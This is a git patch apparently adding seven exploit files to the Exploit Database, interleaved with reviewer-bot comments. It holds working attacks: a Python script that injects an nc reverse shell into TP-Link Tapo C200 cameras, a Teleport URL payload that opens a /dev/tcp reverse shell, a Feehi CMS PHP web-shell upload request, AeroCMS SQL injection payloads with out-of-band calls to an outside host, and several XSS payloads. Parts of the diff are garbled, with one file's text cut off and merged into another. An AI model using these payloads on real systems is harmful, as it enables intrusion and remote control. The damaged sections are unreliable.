From c5397147d9e6ad8ebb47c3d99113be7b36e9c129 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 24 Sep 2022 05:01:44 +0000
Subject: [PATCH] DB: 2022-09-24
7 changes to exploits/shellcodes
Teleport v10.1.1 - Remote Code Execution (RCE)
TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
Aero CMS v0.0.1 - SQLi
Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
---
 exploits/hardware/webapps/51017.py | 32 +++++++++
 exploits/multiple/remote/51019.txt | 19 ++++++
 exploits/php/webapps/51018.txt | 106 +++++++++++++++++++++++++++++
 exploits/php/webapps/51020.txt | 29 ++++++++
 exploits/php/webapps/51021.txt | 24 +++++++
 exploits/php/webapps/51022.txt | 47 +++++++++++++
 exploits/php/webapps/51023.txt | 20 ++++++
 files_exploits.csv | 7 ++
 8 files changed, 284 insertions(+)
 create mode 100755 exploits/hardware/webapps/51017.py
 create mode 100644 exploits/multiple/remote/51019.txt
 create mode 100644 exploits/php/webapps/51018.txt
 create mode 100644 exploits/php/webapps/51020.txt
 create mode 100644 exploits/php/webapps/51021.txt
 create mode 100644 exploits/php/webapps/51022.txt
 create mode 100644 exploits/php/webapps/51023.txt
diff --git a/exploits/hardware/webapps/51017.py b/exploits/hardware/webapps/51017.py
new file mode 100755
index 000000000..39669c68e
--- /dev/null
+++ b/exploits/hardware/webapps/51017.py
@@ -0,0 +1,32 @@
+# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
+# Date: 02/11/2022
+# Exploit Author: hacefresko
+# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
+# Version: 1.1.15 and below
+# Tested on: 1.1.11, 1.1.14 and 1.1.15
+# CVE : CVE-2021-4045
+
+# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce
+
+import requests, urllib3, sys, threading, os
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+PORT = 1337
+REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
+NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)
+
+if len(sys.argv) < 3:
+ print("Usage: python3 pwnTapo.py ")
+ exit()
+
+victim = sys.argv[1]
+attacker = sys.argv[2]
+
+print("[+] Listening on %d" % PORT)
+t = threading.Thread(target=os.system, args=(NC_COMMAND,))
+t.start()
+
+print("[+] Serving payload to %s\n" % victim)
+url = "https://" + victim + ":443/"
+json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
+requests.post(url, json=json, verify=False)
\ No newline at end of file
diff --git a/exploits/multiple/remote/51019.txt b/exploits/multiple/remote/51019.txt
new file mode 100644
index 000000000..8b2c23469
--- /dev/null
+++ b/exploits/multiple/remote/51019.txt
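Review bot: The `print("Usage: python3 pwnTapo.py ")` line names no arguments even though the script reads `sys.argv[1]` and `sys.argv[2]` directly below it, so the usage message does not say what it expects — presumably angle-bracket placeholders were lost somewhere between submission and commit, and the line should spell out both positional arguments. The `exit()` on the next line is the site-module helper rather than `sys.exit`; with `sys` already imported it should be `sys.exit(1)` so the error path returns a non-zero status. The local `json = {...}` shadows the standard-library module name, which is a trap for anyone who later adds `import json`; `body` would read better. `verify=False` together with the `urllib3.disable_warnings(...)` call deserves a one-line comment stating why certificate validation is intentionally skipped for this device (a self-signed camera certificate is the likely reason — confirm) so the pattern is not copied into unrelated tooling; for defenders, the request shape visible here — an HTTPS POST whose JSON `method` is `setLanguage` with shell metacharacters in `params.payload` — is the thing to alert on.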
@@ -0,0 +1,19 @@
+# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
+# Date: 08/01/2022
+# Exploit Author: Brandon Roach & Brian Landrum
+# Vendor Homepage: https://goteleport.com
+# Software Link: https://github.com/gravitational/teleport
+# Version: < 10.1.2
+# Tested on: Linux
+# CVE: CVE-2022-36633
+
+Proof of Concept (payload):
+https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
+f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
+0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
+method=3Diam
+
+
+Decoded payload:
+"
+/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
\ No newline at end of file
diff --git a/exploits/php/webapps/51018.txt b/exploits/php/webapps/51018.txt
new file mode 100644
index 000000000..fefdec63d
--- /dev/null
+++ b/exploits/php/webapps/51018.txt
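Review bot: The committed PoC URL is quoted-printable damaged: the three wrapped lines end in a soft line break `=`, and the query string carries `method=3Diam` where `=3D` is the QP encoding of `=`, so the text as stored is neither the literal request nor consistent with the "Decoded payload" block beneath it. The file should be regenerated from the original submission rather than from an e-mail body, with the URL on a single line. For defenders, the decoded block is the useful part: a request to `/scripts/<...>/install-node.sh` whose path element contains a newline followed by shell text is the pattern this advisory attributes to CVE-2022-36633, and the `Version: < 10.1.2` header gives the patch boundary to check hosts against.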
@@ -0,0 +1,106 @@ +# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 22-08-2022 +# Exploit Author: yuyudhn +# Vendor Homepage: https://feehi.com/ +# Software Link: https://github.com/liufee/cms +# Version: 2.1.1 (REQUIRED) +# Tested on: Linux, Docker +# CVE : CVE-2022-34140 + + + +# Proof of Concept: +1. Login using admin account at http://feehi-cms.local/admin +2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex +3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate +4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. +5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php + +# Burp request example: + +POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 +Host: feehi-cms.local +Content-Length: 1530 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://feehi-cms.local +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; 
_csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D + +Connection: close + + + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="_csrf_backend" + + + +FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[name]" + + + +rce + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[tips]" + + + +rce at Ad management + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[input_type]" + + + +1 + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[ad]" + + + + + +------WebKitFormBoundaryFBYJ8wfp9LBoF4xg + +Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" + +Content-Type: image/png + + + +alert(/XSS/) + d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload + will be executed. + +Note: This change will be permanent until you modify the edited fields. \ No newline at end of file diff --git a/exploits/php/webapps/51021.txt b/exploits/php/webapps/51021.txt new file mode 100644 index 000000000..381682643 --- /dev/null +++ b/exploits/php/webapps/51021.txt 
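Review bot: The 51018.txt section is not self-consistent as committed or as rendered: the multipart body ends immediately after `Content-Type: image/png` with no file content, and what follows — `alert(/XSS/)`, then `d. Save the changes and now go to the Dashboard/WP-UserOnline option` and a `Note:` line — belongs to a different advisory (51020.txt by the diffstat, whose `diff --git` header does not appear anywhere in this chunk). This looks like tag-stripping that swallowed everything from the PHP upload payload through the start of the next file — confirm against the repository before trusting the 106-line count. Independently of that, the Burp example carries live-looking `PHPSESSID`, `BACKEND_FEEHICMS` and `_csrf_backend` cookie values plus the form's `_csrf_backend` token; none of them aid reproduction, and a published PoC should replace session identifiers with `[REDACTED]`. The `# Version: 2.1.1 (REQUIRED)` and `# Tested on: Linux, Docker` headers are clear as written.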
@@ -0,0 +1,24 @@
+# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
+# Date: 2022-08-24
+# Exploit Author: UnD3sc0n0c1d0
+# Vendor Homepage: https://profiles.wordpress.org/3dady/
+# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
+# Category: Web Application
+# Version: 1.0
+# Tested on: Debian / WordPress 6.0.1
+# CVE : N/A
+
+# 1. Technical Description:
+The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text
+and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of
+JavaScript code that can exploit the vulnerability.
+
+# 2. Proof of Concept (PoC):
+ a. Install and activate version 1.0 of the plugin.
+ b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
+ c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
+ " autofocus onfocus=alert(/XSS/)>
+ d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.
+
+ Note: This change will be permanent until you modify the edited fields.
\ No newline at end of file
diff --git a/exploits/php/webapps/51022.txt b/exploits/php/webapps/51022.txt
new file mode 100644
index 000000000..7c4821b59
--- /dev/null
+++ b/exploits/php/webapps/51022.txt
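Review bot: The Technical Description names the vulnerable fields but never states who can reach them: step b goes through `/wp-admin/admin.php?page=3dady`, a plugin settings page that presumably requires the `manage_options` capability, so this is an administrator-level stored XSS, and one sentence saying so under "1. Technical Description" materially changes how a site owner should rate it. The description should also name the fix class instead of only "not properly sanitized" — escape the stored option on output (`esc_attr()` for the attribute context the payload targets) and gate the save handler with a capability and nonce check — since that is what a patch reviewer will look for. `CVE : N/A` and the `[TARGET]` placeholder are appropriate as written.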
@@ -0,0 +1,47 @@
+# Title: Aero CMS v0.0.1 - SQLi
+# Author: nu11secur1ty
+# Date: 08.27.2022
+# Vendor: https://github.com/MegaTKC
+# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
+# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
+
+# Description:
+The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
+be vulnerable to SQL injection attacks.
+The malicious user can dump-steal the database, from this CMS system
+and he can use it for very malicious purposes.
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: author (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
+(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 10 columns
+ Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+UNION ALL SELECT
+NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
+---
+
+```
\ No newline at end of file
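Review bot: The advisory never identifies the vulnerable endpoint: the scanner output gives `Parameter: author (GET)` next to `p_id=4`, but no script path or request line appears anywhere in the file, so a maintainer cannot locate the sink and a defender cannot scope a rule; the request the tool was run against should be stated under `# Description:`. The repeated `load_file('\\\\…kufar.com\\pvq')` fragments in the error-, time- and UNION-based payloads appear to be the scanner's out-of-band DNS-resolution trick pointed at a throwaway hostname rather than part of the injection, so anyone replaying the text as-is sends DNS lookups to a third party — strip them from a published PoC. "STATUS: HIGH Vulnerability" and "dump-steal the database" are vague; a sentence naming what is reachable (authentication, data exposure) would be more useful than the rating. The `# Reference:` path says `2021` while `# Date:` says `08.27.2022`; one of the two is wrong.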
diff --git a/exploits/php/webapps/51023.txt b/exploits/php/webapps/51023.txt
new file mode 100644
index 000000000..bb1010965
--- /dev/null
+++ b/exploits/php/webapps/51023.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
+# Date: 28/08/2022
+# Exploit Author: Ashkan Moghaddas
+# Vendor Homepage: https://testa.cc
+# Software Link:
+https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
+# Version: 3.5.1
+# Tested on: Windows/Linux
+
+# Proof of Concept:
+# 1- Install Testa 3.5.1
+# 2- Go to https://localhost.com/login.php?redirect=XXXX
+# 3- Add payload to the Tab, the XSS Payload:
+%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
+# 4- XSS has been triggered.
+
+# Go to this url "
+https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
+"
+XSS will trigger.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c87248b7a..5bcd9fcac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
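Review bot: `# Version: 3.5.1` and `# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip` contradict each other — the only artifact linked is a 2.0.1 package, so the version claimed as tested cannot be obtained from the advisory; either link the 3.5.1 build or state which package was actually tested. The sample URLs use `https://localhost.com/login.php`, and `localhost.com` is a real public domain rather than the loopback name, so copying the line as written sends the request off-box; `http://localhost/login.php` or a `[TARGET]` placeholder is what is meant. The write-up should also say in one sentence what is currently only implied by the URL: the `redirect` query parameter of `login.php` is reflected into the page without HTML-encoding, and the fix is output-encoding that value (and ideally restricting it to a same-origin path).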
@@ -18727,6 +18727,7 @@ id,file,description,date,author,type,platform,port
 51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
 51015,exploits/ios/remote/51015.txt,"Wifi HD Wireless Disk Drive 11 - Local File Inclusion",1970-01-01,"Chokri Hammedi",remote,ios,
 51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",remote,windows,
+51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",1970-01-01,"Brandon Roach",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
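Review bot: The new index row credits `"Brandon Roach"` alone, while the 51019.txt header added in this same commit names `Brandon Roach & Brian Landrum`; the `author` column should match the file, and since the CSV already quotes multi-word values, `"Brandon Roach & Brian Landrum"` fits without any format change. The `date` column is `1970-01-01` for this row and for all six rows in the next hunk even though every file header carries a real date — if the epoch value is a deliberate placeholder, that convention should be documented next to the CSV header so consumers of the index do not treat it as a disclosure date.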
@@ -45078,3 +45079,9 @@ id,file,description,date,author,type,platform,port
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,
 51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware,
 51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,
+51017,exploits/hardware/webapps/51017.py,"TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)",1970-01-01,hacefresko,webapps,hardware,
+51018,exploits/php/webapps/51018.txt,"Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,yuyudhn,webapps,php,
+51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
+51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
+51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,